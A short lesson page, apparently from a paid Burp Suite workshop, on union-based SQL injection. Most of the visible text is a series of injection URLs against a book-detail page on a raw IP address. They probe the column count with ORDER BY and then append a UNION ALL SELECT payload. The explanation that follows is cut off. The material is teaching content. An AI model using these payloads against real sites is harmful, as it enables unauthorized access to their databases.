C1L5: Union-Based SQL Injection

Please purchase the course before starting the lesson.

http://54.213.252.28/bookdetail.aspx?id=2 order by 100-- http://54.213.252.28/bookdetail.aspx?id=2 order by 50-- http://54.213.252.28/bookdetail.aspx?id=2 order by 25-- http://54.213.252.28/bookdetail.aspx?id=2 order by 10-- http://54.213.252.28/bookdetail.aspx?id=2 order by 5-- http://54.213.252.28/bookdetail.aspx?id=2 order by 6-- http://54.213.252.28/bookdetail.aspx?id=2 order by 7-- http://54.213.252.28/bookdetail.aspx?id=2 order by 8-- http://54.213.252.28/bookdetail.aspx?id=2 order by 9-- http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9-- We are using a union select statement because we are joining the developer's query [...]

Back to: Burp Suite Workshop